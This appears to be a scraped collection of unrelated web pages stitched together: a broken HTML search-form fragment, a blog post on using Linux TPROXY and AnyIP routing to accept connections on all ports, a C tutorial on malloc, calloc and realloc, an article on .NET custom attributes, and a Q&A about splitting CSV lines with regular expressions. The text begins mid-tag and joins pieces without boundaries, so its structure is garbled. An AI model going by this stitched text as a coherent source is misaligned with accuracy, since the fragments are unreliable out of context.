ALIGN="CENTER">Searching the Web</H1> <FORM ACTION="/servlet/moreservlets="altavista"> AltaVista | <INPUT TYPE="RADIO" NAME="searchEngine" VALUE="lycos"> Lycos | <INPUT TYPE="RADIO" NAME="searchEngine" VALUE="hotbot"> HotBot <BR> <INPUT TYPE="SUBMIT" VALUE="Search"> </CENTER> </FORM> </BODY> </HTML>
http://www.informit.com/articles/article.aspx?p=29817&seqNum=7
CC-MAIN-2013-20
refinedweb
2,874
55.95
Building pager view component Whenever we deal with data we need some mechanism for paging it. It makes it easier for users to navigate through data and same time we don’t put too much load to our systems. This blog post shows how to build pager for ASP.NET Core site using ViewComponent and PagedResult class. Source code available! Visual Studio solution demonstrating paging with Entity Framework Core and NHibernate on ASP.NET Core is available at my Github repository gpeipman/DotNetPaging. Samples include LINQ, ICriteria and QueryOver paging methods and UI components. PagedResult revisited Back in times I wrote blog post Returning paged results from repositories using PagedResult where I show how to build generic paged results class that you can put to infrastructur layer or some widely used library in your system. As this class doesn’t have any dependencies coming in form another parts of your system you can use this class with practically all kinds of data. Over times I have made some modifications to this class and refactored it but in big part it’s still the same. public abstract class PagedResultBase { public int CurrentPage { get; set; } public int PageCount { get; set; } public int PageSize { get; set; } public int RowCount { get; set; } public int FirstRowOnPage { get { return (CurrentPage - 1) * PageSize + 1; } } public int LastRowOnPage { get { return Math.Min(CurrentPage * PageSize, RowCount); } } } public class PagedResult<T> : PagedResultBase where T : class { public IList<T> Results { get; set; } public PagedResult() { Results = new List<T>(); } } I separated paging and data container to separate classes that are bound with each other through inheritance. The concept of PagedResult that is fully used by calling code is good because you can take this class to all flavours of .NET. NB! To see some real code that uses PagedResult class please refer to my blog post Returning paged results from repositories using PagedResult. Although this post uses single class version of PagedResult it’s still valid in the context of this post. Building pager view component Now let’s build ASP.NET MVC view component to display paged results. View components are like replacement for child actions. They have their own classes and views and they support also dependency injection. Usually I put code part of view components to Extensions folder of my web application or web utilities project. Here is the code part of pager view component. public class PagerViewComponent : ViewComponent{ public Task<IViewComponentResult> InvokeAsync(PagedResultBase result) { return Task.FromResult((IViewComponentResult)View("Default", result)); } } You can add Invoke() method instead of asynchronous one but remember one thing: you can’t have both methods for component at same time. As I’m writing this code currently on ASP.NET Core then I prefer asynchronous code. Now let’s add ViewComponent view to display data. Views of view components should be placed to folder Views/Shared/Components/<ViewComponentName>. For pager I have folder Views/Shared/Components/Pager. Let’s add view called Default.cshtml to this folder. @model PagedResultBase @{ var urlTemplate = Url.Action() + "?page={0}"; var request = ViewContext.HttpContext.Request; foreach (var key in request.Query.Keys) { if (key == "page") { continue; } urlTemplate += "&" + key + "=" + request.Query[key]; } var startIndex = Math.Max(Model.CurrentPage - 5, 1); var finishIndex = Math.Min(Model.CurrentPage + 5, Model.PageCount); } <div class="row"> <div class="col-md-4 col-sm-4 items-info"> Items @Model.FirstRowOnPage to @Model.LastRowOnPage of @Model.RowCount total </div> <div class="col-md-8 col-sm-8"> @if (Model.PageCount > 1) { <ul class="pagination pull-right"> <li><a href="@urlTemplate.Replace("{0}", "1")">«</a></li> @for (var i = startIndex; i <= finishIndex; i++) { @if (i == Model.CurrentPage) { <li><span>@i</span></li> } else { <li><a href="@urlTemplate.Replace("{0}", i.ToString())">@i</a></li> } } <li><a href="@urlTemplate.Replace("{0}", Model.PageCount.ToString())">»</a></li> </ul> } </div> </div> On my sample web project the pager looks like shown on the following screenshot. It’s simple and looks nice and we didn’t wrote too much code to achieve output like this. How it works? Now you may ask how can be PagedResultBase enough for displaying pager with links? And you have right to be suspicious about the solution :) Actually I use here one simple trick. All my paging scenarios follow the same simple pattern – paging is done always by same controller action. I mean search results are shown by same controller action no matter what is the results page index. Same goes for product lists, manufacturers lists etc. As action for given pages data is always the same I can create URL template for pager. All I have to do is to omit parameter called “page” as this is the one that gets new value for every page link. Calling pager from views Suppose you have view where you display products by pages. As a model you use PagedResult<Product>. To display pager you add the following line to view. @(await Component.InvokeAsync<PagerViewComponent>(Model)) This line displays pager using pager view component. Example of pager is on the bottom left corner of my beer store demo application screenshot. Wrapping up PagedResult<T> is pretty good construct for supporting paging. It has no dependencies to other layers and therefore it is easy to use on all different .NET frameworks. Using view components it was easy to build generic pager component that can be used in all views that need paging. As pager mark-up is held in regular view file it is easy to change the output if needed. 3 thoughts on “Building pager view component” At last, I find a blog where described Pager view component very easily. I think this is a very important post for the beginner’s learners. I try to find Pager view component related post since last month but finally I find your blog. thanks for sharing, if I need some help about this code I know you will be kind, Thank you so much. :) It doesn’t make much sense to use a ViewComponent to render a pager. A tag helper-based solution seems far more preferable to me. I will add tag-helper based pager to this public solution: Thanks for advice, Paul!
https://gunnarpeipman.com/aspnet/pager-view-component/
CC-MAIN-2019-30
refinedweb
1,025
66.94
Today we are introducing Spectrum: a new Cloudflare feature that brings DDoS protection, load balancing, and content acceleration to any TCP-based protocol. CC BY-SA 2.0 image by Staffan Vilcans Soon after we started building Spectrum, we hit a major technical obstacle: Spectrum requires us to accept connections on any valid TCP port, from 1 to 65535. On our Linux edge servers it’s impossible to “accept inbound connections on any port number”. This is not a Linux-specific limitation: it’s a characteristic of the BSD sockets API, the basis for network applications on most operating systems. Under the hood there are two overlapping problems that we needed to solve in order to deliver Spectrum: - how to accept TCP connections on all port numbers from 1 to 65535 - how to configure a single Linux server to accept connections on a very large number of IP addresses (we have many thousands of IP addresses in our anycast ranges) Assigning millions of IPs to a server Cloudflare’s edge servers have an almost identical configuration. In our early days, we used to assign specific /32 (and /128) IP addresses to the loopback network interface[1]. This worked well when we had dozens of IP addresses, but failed to scale as we grew. Along came the “AnyIP” trick. AnyIP allows us to assign whole IP prefixes (subnets) to the loopback interface, expanding from specific IP addresses. There is already common use of AnyIP: your computer has 127.0.0.0/8 assigned to the loopback interface. From the point of view of your computer, all IP addresses from 127.0.0.1 to 127.255.255.254 belong to the local machine. This trick is applicable to more than the 127.0.0.1/8 block. To treat the whole range of 192.0.2.0/24 as assigned locally, run: ip route add local 192.0.2.0/24 dev lo Following this, you can bind to port 8080 on one of these IP addresses just fine: nc -l 192.0.2.1 8080 Getting IPv6 to work is a bit harder: ip route add local 2001:db8::/64 dev lo Sadly, you can’t just bind to these attached v6 IP addresses like in the v4 example. To get this working you must use the IP_FREEBINDsocket option, which requires elevated privileges. For completeness, there is also a sysctl net.ipv6.ip_nonlocal_bind, but we don’t recommend touching it. This AnyIP trick allows us to have millions of IP addresses assigned locally to each server: $ ip addr show 1: lo: mtu 65536 inet 1.1.1.0/24 scope global lo valid_lft forever preferred_lft forever inet 104.16.0.0/16 scope global lo valid_lft forever preferred_lft forever ... Binding to ALL ports The second major issue is the ability to open TCP sockets for any port number. In Linux, and generally in any system supporting the BSD sockets API, you can only bind to a specific TCP port number with a single bindsystem call. It’s not possible to bind to multiple ports in a single operation. A naive solution would be to bind65535 times, once for each of the 65535 possible ports. Indeed, this could have been an option, but with terrible consequences: Internally, the Linux kernel stores listening sockets in a hash table indexed by port numbers, LHTABLE, using exactly 32 buckets: /* Yes, really, this is all you need. */ #define INET_LHTABLE_SIZE 32 Had we opened 65k ports, lookups to this table would slow drastically: each hash table bucket would contain two thousand items. Another way to solve our problem would be to use iptables’ rich NAT features: we could rewrite the destination of inbound packets to some specific address/port, and our application would bind to that. We didn’t want to do this though, since it requires enabling the iptables conntrackmodule. Historically we found some performance edge cases, and conntrack cannot cope with some of the large DDoS attacks that we encounter. Additionally, with the NAT approach we would lose destination IP address information. To remediate this, there exists a poorly known SO_ORIGINAL_DSTsocket option, but the code doesn’t look encouraging. Fortunately, there is a way to achieve our goals that does not involve binding to all 65k ports, or use conntrack. Firewall to the rescue Before we go any further, let’s revisit the general flow of network packets in an operating system. Commonly, there are two distinct layers in the inbound packet path: - IP firewall - network stack These are conceptually distinct. The IP firewall is usually a stateless piece of software (let’s ignore conntrackand IP fragment reassembly for now). The firewall analyzes IP packets and decides whether to ACCEPT or DROP them. Please note: at this layer we are talking about packets and port numbers – not applications or sockets. Then there is the network stack. This beast maintains plenty of state. Its main task is to dispatch inbound IP packets into sockets, which are then handled by userspace applications. The network stack manages abstractions which are shared with userspace. It reassembles TCP flows, deals with routing, and knows which IP addresses are local. The magic dust Source: still from YouTube At some point we stumbled upon the TPROXYiptables module. The official documentation is easy to overlook: TPROXY. Another piece of documentation can be found in the kernel: The more we thought about it, the more curious we became… So… What does TPROXY actually do? Revealing the magic trick The TPROXYcode is surprisingly trivial: case NFT_LOOKUP_LISTENER: sk = inet_lookup_listener(net, &tcp_hashinfo, skb, ip_hdrlen(skb) + __tcp_hdrlen(tcph), saddr, sport, daddr, dport, in->ifindex, 0); Let me read this out loud for you: in an iptables module, which is part of the firewall, we call inet_lookup_listener. This function takes a src/dst port/IP 4-tuple, and returns the listening socket that is able to accept that connection. This is a core functionality of the network stack’s socket dispatch. Once again: firewall code calls a socket dispatch routine. Later on TPROXYactually does the socket dispatch: skb->sk = sk; This line assigns a socket struct sockto an inbound packet – completing the dispatch. Pulling the rabbit from the hat CC BY-SA 2.0 image by Angela Boothroyd Armed with TPROXY, we can perform the bind-to-all-ports trick very easily. Here’s the configuration: # Set 192.0.2.0/24 to be routed locally with AnyIP. # Make it explicit that the source IP used for this network # when connecting locally should be in 127.0.0.0/8 range. # This is needed since otherwise the TPROXY rule would match # both forward and backward traffic. We want it to catch # forward traffic only. sudo ip route add local 192.0.2.0/24 dev lo src 127.0.0.1 # Set the magical TPROXY routing sudo iptables -t mangle -I PREROUTING -d 192.0.2.0/24 -p tcp -j TPROXY --on-port=1234 --on-ip=127.0.0.1 In addition to setting this in place, you need to start a TCP server with the magical SO_TRANSPARENTsocket option. Our example below needs to listen on tcp://127.0.0.1:1234. The man page for SO_TRANSPARENTshows: IP_TRANSPARENT (since Linux 2.6.24) Setting this boolean option enables transparent proxying on this socket. This socket option allows the calling applica‐ tion to bind to a nonlocal IP address and operate both as a client and a server with the foreign address as the local end‐point. NOTE: this requires that routing be set up in a way that packets going to the foreign address are routed through the TProxy box (i.e., the system hosting the application that employs the IP_TRANSPARENT socket option). Enabling this socket option requires superuser privileges (the CAP_NET_ADMIN capability). TProxy redirection with the iptables TPROXY target also requires that this option be set on the redirected socket. Here’s a simple Python server: import socket IP_TRANSPARENT = 19 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.setsockopt(socket.IPPROTO_IP, IP_TRANSPARENT, 1) s.bind(('127.0.0.1', 1234)) s.listen(32) print("[+] Bound to tcp://127.0.0.1:1234") while True: c, (r_ip, r_port) = s.accept() l_ip, l_port = c.getsockname() print("[ ] Connection from tcp://%s:%d to tcp://%s:%d" % (r_ip, r_port, l_ip, l_port)) c.send(b"hello worldn") c.close() After running the server you can connect to it from arbitrary IP addresses: $ nc -v 192.0.2.1 9999 Connection to 192.0.2.1 9999 port [tcp/*] succeeded! hello world Most importantly, the server will report the connection indeed was directed to 192.0.2.1 port 9999, even though nobody actually listens on that IP address and port: $ sudo python3 transparent2.py [+] Bound to tcp://127.0.0.1:1234 [ ] Connection from tcp://127.0.0.1:60036 to tcp://192.0.2.1:9999 Tada! This is how to bind to any port on Linux, without using conntrack. That’s all folks In this post we described how to use an obscure iptables module, originally designed to help transparent proxying, for something slightly different. With its help we can perform things we thought impossible using the standard BSD sockets API, avoiding the need for any custom kernel patches. The TPROXYmodule is very unusual – in the context of the Linux firewall it performs things typically done by the Linux network stack. The official documentation is rather lacking, and I don’t believe many Linux users understand the full power of this module. It’s fair to say that TPROXYallows our Spectrum product to run smoothly on the vanilla kernel. It’s yet another reminder of how important it is to try to understand iptables and the network stack! Doing low level socket work sound interesting? Join our world famous team in London, Austin, San Francisco, Champaign and our elite office in Warsaw, Poland. VISIT THE SOURCE ARTICLE Abusing Linux’s firewall: the hack that allowed us to build Spectrum
https://networkfights.com/2018/04/12/abusing-linuxs-firewall-the-hack-that-allowed-us-to-build-spectrum/
CC-MAIN-2018-34
refinedweb
1,667
56.66
Content-type: text/html #include <scnhdr.h> Every object file has a group of section headers to specify the layout of the data within the file. Each section within an object file has its own header. The C structure is as follows: struct scnhdr { char s_name[8]; /* section name */ long s_paddr; /* physical address, aliased s_nlib */ long s_vaddr; /* virtual address */ long s_size; /* section size */ long s_scnptr; /* file ptr to raw data for section */ long s_relptr; /* file ptr to relocation */ long s_lnnoptr; /* special purpose */ unsigned short s_nreloc; /* number of reloc entries */ unsigned short s_nlnno; /* unused */ int s_flags; /* flags */ }; File pointers are byte offsets into the file; they can be used as the offset in a call to FSEEK (see ldfcn(4)). If a section is initialized, the file contains the actual bytes. An uninitialized section is somewhat different. It has a size, symbols defined in it, and symbols that refer to it. But it can have no relocation entries or data. Consequently, an uninitialized section has no raw data in the object file, and the values for s_scnptr, s_relptr, and s_nreloc are zero. The entries that refer to line numbers (s_lnnoptr, and s_nlnno) are not related to line number information. See the header file sym.h for the entries to get to the line number table. The entries that were for line numbers are reserved and should be set to zero. The number of relocation entries for a section is found in the s_nreloc field of the section header. Being a `C' language short, this field can overflow with large objects. If this field overflows, the section header s_flags field has the SM S_NRELOC_OVFL bit set. In this case, the true number of relocation entries is found in the r_vaddr field of the first relocation entry for that section. That relocation entry has a type of SM R_ABS, so it is ignored when the relocation takes place. ld(1), fseek(3), a.out(4), reloc(4). delim off
http://backdrift.org/man/tru64/man4/scnhdr.4.html
CC-MAIN-2016-50
refinedweb
326
63.09
This is the mail archive of the gcc-patches@gcc.gnu.org mailing list for the GCC project. On Fri, Mar 16, 2001 at 07:51:07AM -0800, H . J . Lu wrote: > On Fri, Mar 16, 2001 at 12:01:31PM +0100, Jakub Jelinek wrote: > > Hi! > > > > As result of recent atexit changes in glibc using atexit in i386-linux > > crtendS.o is bad (since if the shared library does not use atexit, it won't > > be taken from libc_nonshared and shared library will thus end up with > > non-versioned atexit reference). > > According to H.J., this kludge was needed only for very very old Linux C > > libraries and can be safely killed. > > Ok to commit? > > > > How about this patch? The old libc still needs it. In that case, isn't it better to move it out of crtstuff.c into target headers? 2001-03-16 Jakub Jelinek <jakub@redhat.com> * crtstuff.c (init_dummy): Use CRT_END_INIT_DUMMY if defined. Remove ia32 linux PIC kludge and move it... * config/i386/linux.h (CRT_END_INIT_DUMMY): ...here. --- gcc/config/i386/linux.h.jj Mon Mar 12 11:45:15 2001 +++ gcc/config/i386/linux.h Fri Mar 16 18:52:31 2001 @@ -170,3 +170,21 @@ Boston, MA 02111-1307, USA. */ } \ } while (0) #endif + +#if defined(__PIC__) && defined (USE_GNULIBC_1) +/*. */ + +#define CRT_END_INIT_DUMMY \ + do \ + { \ + extern void *___brk_addr; \ + extern char **__environ; \ + \ + ___brk_addr = __environ; \ + atexit (0); \ + } \ + while (0) +#endif --- gcc/crtstuff.c.jj Thu Mar 15 10:55:50 2001 +++ gcc/crtstuff.c Thu Mar 15 11:04:03 2001 @@ -414,20 +414,8 @@ init_dummy (void) (0); - } +#ifdef CRT_END_INIT_DUMMY + CRT_END_INIT_DUMMY; #endif } Jakub
http://gcc.gnu.org/ml/gcc-patches/2001-03/msg01187.html
CC-MAIN-2019-30
refinedweb
262
70.19
Interface for a seekable & readable data stream. More... #include <stream.h> List of all members. Interface for a seekable & readable data stream. Definition at line 571 of file stream.h. 16 0 Print a hexdump of the stream while maintaing position. The number of bytes per line is customizable. Definition at line 261 of file stream.cpp. [pure virtual] Obtains the current value of the stream position indicator of the stream. Implemented in Common::MemoryReadStream, Common::SeekableSubReadStream, Common::GZipReadStream, Grim::PatchedFile, and Grim::PackFile. true [virtual] Reads at most one less than the number of characters specified by bufSize from the and stores them in the string buf. Reading stops when the end of a line is reached (CR, CR/LF or LF), and at end-of-file or error. The newline, if any, is retained (CR and CR/LF are translated to LF = 0xA = ' '). If any characters are read and there is no error, a `' character is appended to end the string. Upon successful completion, return a pointer to the string. If end-of-file occurs before any characters are read, returns NULL and the buffer contents remain unchanged. If an error occurs, returns NULL and the buffer contents are indeterminate. This method does not distinguish between end-of-file and error; callers must use err() or eos() to determine which occurred. Definition at line 127 of file stream.cpp. Reads a full line and returns it as a Common::String. Reading stops when the end of a line is reached (CR, CR/LF or LF), and at end-of-file or error. Upon successful completion, return a string with the content of the line, *without* the end of a line marker. This method does not indicate whether an error occurred. Callers must use err() or eos() to determine whether an exception occurred. Definition at line 190 of file stream.cpp. SEEK_SET Sets the stream position indicator for seek() method clears the end-of-file indicator for the stream. Obtains the total size of the stream, measured in bytes. If this value is unknown or can not be computed, -1 is returned. [inline, virtual] TODO: Get rid of this??? Or keep it and document it. Definition at line 611 of file stream.h.
https://doxygen.residualvm.org/d3/d59/classCommon_1_1SeekableReadStream.html
CC-MAIN-2020-40
refinedweb
374
68.16
bt_ldev_invoke_decode_event() This function is used to parse the Bluetooth event data received over the invoke interface when "bb.action.bluetooth.EVENT" occurs. Synopsis: #include <btapi/btdevice.h> int bt_ldev_invoke_decode_event(const char *invoke_data, int invoke_len, int *event, const char **bdaddr, const char **event_data) Since: BlackBerry 10.3.0 Arguments: - invoke_data The data provided by the invoke interface. - invoke_len The length of the data provided by the invoke interface. - event Returns the event which triggered the invoke. - bdaddr A pointer to the Bluetooth address of the event from within the invoke data. This pointer is valid only for the lifespan of the invoke data. - event_data A pointer to the event data from within the invoke data. This pointer references is valid only for the lifespan of the invoke data. Library:libbtapi (For the qcc command, use the -l btapi option to link against this library) Description: The data that is provided must have the mime-type of "application/vnd.blackberry.bluetooth.event". You must call bt_device_init() before calling this function. Returns: - EAGAIN: bt_device_init() was not called. - EPROTO: The data provided is not properly formatted to the required mime-type. - EINVAL: One or more of the variables provided are invalid. - ESRVRFAULT: An internal error has occurred. Last modified: 2014-05-14 Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus
https://developer.blackberry.com/native/reference/core/com.qnx.doc.bluetooth.lib_ref/topic/bt_ldev_invoke_decode_event.html
CC-MAIN-2020-10
refinedweb
224
52.05
Embedded and other low-memory footprint applications need to be easy on the amount of memory they use when executing. In such scenarios, statically sized data types and data structures just are not going to solve your problem. The best way to achieve this is by allocation of memory for variables at runtime under your watchful eye. This way your program is not using more memory than it has to at any given time. However, it is important to note that the amount of memory that can be allocated by a call to any of these functions is different on every operating system. Dynamic Memory Allocation malloc, calloc, or realloc are the three functions used to manipulate memory. These commonly used functions are available through the stdlib library so you must include this library in order to use them. After including the stdlib library you can use the malloc, calloc, or realloc functions to manipulate chunks of memory for your variables. Dynamic Memory Allocation Process When a program executes, the operating system gives it a stack and a heap to work with. The stack is where global variables, static variables, and functions and their locally defined variables reside. The heap is a free section for the program to use for allocating memory at runtime. Allocating a Block of Memory Use the malloc function to allocate a block of memory for a variable. If there is not enough memory available, malloc will return NULL. The prototype for malloc is: void *malloc(size_t size); Do not worry about the size of your variable, there is a nice and convenient function that will find it for you, called sizeof. Most calls to malloc will look like the following example: ptr = (struct mystruct*)malloc(sizeof(struct mystruct)); This way you can get memory for your structure variable without having to know exacly how much to allocate for all its members as well. Allocating Multiple Blocks of Memory You can also ask for multiple blocks of memory with the calloc function: void *calloc(size_t num, size_t size); If you want to allocate a block for a 10 char array, you can do this: char *ptr; ptr = (char *)calloc(10, sizeof(char)); The above code will give you a chunk of memory the size of 10 chars, and the ptr variable would be pointing to the beginning of the memory chunk. If the call fails, ptr would be NULL. Releasing the Used Space All calls to the memory allocating functions discussed here, need to have the memory explicitly freed when no longer in use to prevent memory leaks. Just remember that for every call to an *alloc function you must have a corresponding call to free. The function call to explicitly free the memory is very simple and is written as shown here below: free(ptr); Just pass this function the pointer to the variable you want to free and you are done. To Alter the Size of Allocated Memory Lets get to that third memory allocation function, realloc. void *realloc(void *ptr, size_t size); Pass this function the pointer to the memory you want to resize and the new size you want to resize the allocated memory for the variable you want to resize. Here is a simple and trivial example to give you a quick idea of how you might see calloc and realloc in action. You will have many chances for malloc viewing as it is the most popular of the three by far. allocation.c: #include <stdio.h> #include <stdlib.h> void main() { char *ptr, *retval; ptr = (char *)calloc(10, sizeof(char)); if (ptr == NULL) printf("calloc failed\n"); else printf("calloc successful\n"); retval = realloc(ptr, 5); if (retval == NULL) printf("realloc failed\n"); else printf("realloc successful\n"); free(ptr); free(retval); } First we declared two pointers and allocated a block of memory the size of 10 chars for ptr using the calloc function. The second pointer retval is used for getting the return value from the call to realloc. Then we reallocate the size of ptr to 5 chars instead of 10. After we check whether all went well with that call, we free up both pointers. You can play around with the values of size passed to either of the memory allocation functions to see how big a chunk you can ask for before it fails on you. Do not worry, your operating system has the ability to keep your program in check, you will not hurt it this way. Here is the output: ~/Projects/C_tutorials/dynamic memory allocation/samples $ ./all ocation calloc successful realloc successful ~/Projects/C_tutorials/dynamic memory allocation/samples $
https://www.exforsys.com/tutorials/c-language/dynamic-memory-allocation-in-c.html
CC-MAIN-2021-39
refinedweb
774
57.81
Understanding .NET Attributes Introduction . What are .NET Attributes? A .NET attribute is a piece of information that you can attach with an assembly, class, property, method and other members. An attribute contributes to the metadata about an entity under consideration. An attribute is basically a class that is either inbuilt or developer defined. Once created, an attribute can be applied to various targets including the ones mentioned above. To understand this better, let's take an example. Consider the following piece of code: [WebService] public class WebService1 : System.Web.Services.WebService { [WebMethod] public string HelloWorld() { return "Hello World"; } } Attributes can be broadly classified into two types - inbuilt and custom. The inbuilt attributes are provided by .NET framework and you can readily use them whenever required. Custom attributes are developer defined classes. You will learn to create custom attributes later in this article. If you observe a newly created project in Visual Studio, you will find a file named AssemblyInfo.cs. This file houses attributes that are applicable to the entire project assembly. For example,")] As you can see there are many attributes such as AssemblyTitle, AssemblyDescription and AssemblyVersion. Since their target is the underlying assembly, they use [assembly: <attribute_name>] syntax. Information about the attributes can be obtained through reflection. Most of the inbuilt attributes are handled by .NET framework internally but for custom attributes you may need to devise a mechanism to observe the metadata emitted by them. You will see an example of this in later sections of this article. Using Inbuilt Attributes Now that you have some understanding of .NET attributes, let's see a more real world case where attributes are used. In this section you will use Data Annotation Attributes to validate model data. Begin by creating a new ASP.NET MVC Web Application. Then add a class to the Models folder and name it as Customer. The Customer class contains just two public properties and is shown below: using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.ComponentModel.DataAnnotations; namespace CustomAttributesMVCDemo.Models { public class Customer { [Required] public string CustomerID { get; set; } [Required] [StringLength(20,MinimumLength=5,ErrorMessage="Invalid company name!")] public string CompanyName { get; set; } } } Notice the above code carefully. The Customer class consists of two string properties - CustomerID and CompanyName. What is more important for us is that these properties are decorated with data annotation attributes residing in the System.ComponentModel.DataAnnotations namespace. The [Required] attribute indicates that the CustomerID property must be assigned some value in order to consider it to be a valid model. Similarly, the CompanyName property is decorated with [Required] and [StringLength] attributes. The [StringLength] attribute is used to specify that the CompanyName should be a minimum five characters long and maximum twenty characters long. An error message is also specified in case the value assigned to the CompanyName property doesn't meet the criteria. Note that [Required] and [StringLength] attributes are actually classes - RequiredAttribute and StringLengthAttribute - defined in the System.ComponentModel.DataAnnotations namespace. The MinimumLength and ErrorMessage are the properties of StringLength class and they are set as shown above. Now, add the HomeController class to the Controllers folder and write the following action methods: public ActionResult Index() { return View(); } public ActionResult ProcessForm() { Customer obj = new Customer(); bool flag = TryUpdateModel(obj); if(flag) { ViewBag.Message = "Customer data received successfully!"; } else { ViewBag.Message = "Customer data validation failed!"; } return View("Index"); } The Index() action method simply returns the Index view. The Index.cshtml consists of a simple <form> as shown below: <form action="/home/processform" method="post"> <span>Customer ID : </span> <input type="text" name="customerid" /> <span>Company Name : </span> <input type="text" name="companyname" /> <input type="submit" value="Submit" /> </form> <strong>@ViewBag.Message</strong> <strong>@Html.ValidationSummary()</strong> The values entered in the customerid textbox and companyname textbox are submitted to the ProcessForm() action method. The ProcesssForm() action method uses TryUpdateModel() method to assign the properties of the Customer model with the form field values. The TryUpdateModel() method returns true if the model properties contain valid data as per the condition set by the data annotation attributes, otherwise it returns false. Accordingly, the Message property of the ViewBag is set to a message. The model errors are displayed on the page using ValidationSummary() Html helper. Now, run the application and try submitting the form without entering CompanyName value. The following figure shows how the error message is displayed: Validation Error Message Thus data annotation attributes are used by ASP.NET MVC to perform model validations. Creating Custom Attributes In the preceding example, you used some inbuilt attributes. In this section you will create a custom attribute and then use it in an application. For the sake of this example let's assume that you have developed a class library that contains some complex business processing. You want that this class library should be consumed by only those applications that have a valid license key supplied by you. You can devise a simple technique to accomplish this task. Note: Remember that we are developing this example purely for the sake of demonstrating the usage of custom attributes. In a real world case you may resort to a more robust and professional licensing system. { public string Key { get; set; } } } As you can see the MyLicenseAttribute class is created by inheriting it from the Attribute base class. The Attribute base class is provided by the .NET framework. By convention all the attribute classes end with "Attribute". However, while using these attributes you don't need to specify "Attribute". Thus MyLicenseAttribute class will be used as [MyLicense] on the target. The MyLicenseAttribute class contains just one property - Key - that represents a license key. The MyLicenseAttribute itself is decorated with an inbuilt attribute - [AttributeUsage]. The [AttributeUsage] attribute is used to set the target for the custom attribute being created. A value of AttributeTargets.All means that MyLicenseAttribute can be applied to any entity (assembly, class, method etc.). You can use various members of the AttributeTargets enumeration to narrow down the target of the custom attribute. Now, add another class library to the same solution and name it ComplexClassLib. The ComplexClassLib represents the class library doing some complex task and consists of a class as shown below: public class ComplexClass1 { public string ComplexMethodRequiringKey() { //some code goes here return "Hello World!"; } } The ComplexMethodRequiringKey() method of the ComplexClass1 is supposed to be doing some complex operation. You will revisit this method shortly. Using Custom Attributes Next, add an ASP.NET Web Forms Application to the same solution. Refer both - LicenseKeyAttributeLib and ComplexClassLib - assemblies in the web application. Then invoke you created earlier. Open the AssemblyInfo.cs file from the web application and add the following code to it: using System.Reflection; ... using LicenseKeyAttributeLib; ... [assembly: MyLicense(Key = "4fe29aba")] The AssemblyInfo.cs file now uses MyLicense custom attribute to specify a license key. Notice that although the attribute class name is MyLicenseAttribute, while using the attribute you just mention it as MyLicense. Obtaining Attribute Information Using Reflection So far so good. You created a custom attribute and you also used it in a web application. But what's the real use of this attribute? Where exactly the license key is being validated? That's the last piece of code you need to glue in this example. Open the ComplexClass1 from ComplexClassLib project again. Refer LicenseKeyAttributeLib assembly inside the ComplexClassLib project. Then modify the ComplexMethodRequiringKey() method as follows: public string ComplexMethodRequiringKey() { Assembly a = Assembly.GetCallingAssembly(); MyLicenseAttribute attb = a.GetCustomAttribute<MyLicenseAttribute>(); if(attb==null) { throw new Exception("You don't have a license key!"); } else { //validate license key here //throw exception if invalid } return "Your license key is " + attb.Key; } The ComplexMethodRequiringKey() method is now modified to read the MyLicense attribute. This is done using reflection. The GetCallingAssembly() method of the Assembly class returns the Assembly that is currently calling the ComplexMethodRequiringKey() method. The code then uses GetCustomAttribute() method to retrieve the MyLicenseAttribute information. If the calling assembly (web application in this case) doesn't contain [MyLicense] attribute then GetCustomAttribute() will return null. If so the code throws an exception. If [MyLicense] attribute is applied to the calling assembly its license key can be retrieved using the Key property of the MyLicenseAttribute class. Although the above code doesn't validate the license key as such you can add such a logic as per your requirement (see the comment placeholder in the code). Now run the web application and you should see the license key being outputted in the browser. Then remove the [MyLicense] attribute from the AssemblyInfo.cs file and run the application again. This time you will get an exception - "You don't have a license key!". You Don't Have a License Key Summary Attributes allow you to add metadata to their target. The .NET framework provides several inbuilt attributes and you can also create your own. This article introduced you to .NET attributes. You learned to use inbuilt data annotation attributes to validate model data. You also created a custom attribute and used it to decorate an assembly. A custom attribute is a class usually derived from the Attribute base class. You can add members to the custom attribute class just like you do for any other class. You can also specify a target for the attribute class using [AttributeUsage] attribute and AttributeTargets enumeration. There are no comments yet. Be the first to comment!
http://www.codeguru.com/csharp/.net/understanding-.net-attributes.htm
CC-MAIN-2014-15
refinedweb
1,560
50.23
On Wed, 2013-12-04 at 09:50 -0500, Stephen Frost wrote: > > I still don't see that Extension Templates are all bad: > > * They preserve the fact that two instances of the same extension > > (e.g. in different databases) were created from the same template. > > This is only true if we change the extension templates to be shared > catalogs, which they aren't today.. Advertising I agree with you about that -- I don't like per-DB templates. I guess the challenge is that we might want to use namespaces to support user-installable extensions, and namespaces reside within a DB. But I think we can find some other solution there (e.g. user names rather than schemas), and per-DB templates are just not a good solution anyway. Regards, Jeff Davis -- Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org) To make changes to your subscription:
https://www.mail-archive.com/pgsql-hackers@postgresql.org/msg227519.html
CC-MAIN-2018-26
refinedweb
148
73.37
I have this code to split a complicated CSV file into chunks. The hard bit is that commas may also appear within "" and thus those must not be split on. The regex I am using to find commas not within "" works fine: comma_re = re.compile(r',(?=([^"]*""[^"]*"")*[^"]*$)') import re test = 'Test1,Test2,"",Test3,Test4"",Test5' comma_re = re.compile(r',(?=([^"]*""[^"]*"")*[^"]*$)') print comma_re.split(test) ['Test1', 'Test2,"",Test3,Test4""', 'Test2', '"",Test3,Test4""', '"",Test3,Test4""', None, 'Test5'] ['Test1', 'Test2', '"",Test3,Test4""', 'Test5'] (?<!"),(?![^",]+")|,(?=[^"]*$) Will work for the example you gave, although it won't work if the input differs from that format. input = 'Test1,Test2,"",Test3,Test4"",Test5' output = re.split(r'(?<!"),(?![^",]+")|,(?=[^"]*$)', input) print(output) # ['Test1', 'Test2', '"",Test3,Test4""', 'Test5'] You should really be using a CSV parser for this. If you can't for some reason - just do some manual string processing, going through character by character and splitting when you see a comma, unless you have recognised you are in a quoted string. Something like the following: input = 'Test1,Test2,"",Test3,Test4"",Test5' insideQuoted = False output = [] lastIndex = 0 for i in range(0, len(input)): if input[i] == ',' and not insideQuoted: output.append(input[lastIndex: i]) lastIndex = i + 1 elif input[i] == '"' and i < len(input) - 1 and input[i + 1] == '"': insideQuoted ^= True elif i == len(input) - 1: output.append(input[lastIndex: i + 1])
https://codedump.io/share/f2prnzPv9HLg/1/regex-avoid-quotrest-of-stringquot-split-results
CC-MAIN-2017-17
